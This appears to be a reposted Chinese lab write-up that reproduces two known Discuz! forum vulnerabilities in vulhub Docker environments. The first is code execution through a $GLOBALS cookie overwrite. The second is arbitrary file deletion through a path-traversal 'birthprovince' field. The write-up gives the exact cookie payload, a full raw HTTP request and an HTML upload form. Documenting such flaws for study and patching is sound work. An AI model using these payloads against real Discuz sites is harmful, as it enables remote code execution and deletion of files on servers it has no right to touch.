admin管理员组文章数量:1637860
前言
Crossday Discuz! Board(简称 Discuz!)是一套通用的社区论坛软件系统
靶场:192.168.4.10_ubuntu
一、 wooyun-2010-080723_Discuz 7.x/6.x 全局变量防御绕过导致代码执行
漏洞原理
由于php5.3.x版本里php.ini的设置里`request_order`默认值为GP,导致`$_REQUEST`中不再包含`$_COOKIE`,我们通过在Cookie中传入`$GLOBALS`来覆盖全局变量,造成代码执行漏洞。
漏洞复现
1. 环境搭建
#docker-compose up -d
Discuz环境配置
访问`http://your-ip:8080/install/`来安装discuz,数据库地址填写`db`,数据库名为`discuz`,数据库账号密码均为`root`。
2. 漏洞利用
安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加`GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();`:
成功执行
二、 x3.4-arbitrary-file-deletion_Discuz!X ≤3.4 任意文件删除漏洞
1. 环境搭建
#docker-compose up -d
访问http://192.168.4.10/install安装discuz数据库,地址db,其他默认
2. 漏洞复现
(1) 访问http://192.168.4.10/robots.txt
(2) 注册一个账户,注册完之后发送数据包
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
发送成功可看到个人信息出生地已经被修改
可说明我们的脏数据已经进入数据库了。
(3) 新建一个`upload.html`
```
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>
```
用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。
(4) 再次访问`http://your-ip/robots.txt`,文件成功被删除:
版权声明:本文标题:vulhub漏洞复现八_discuz 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729255395a1192604.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论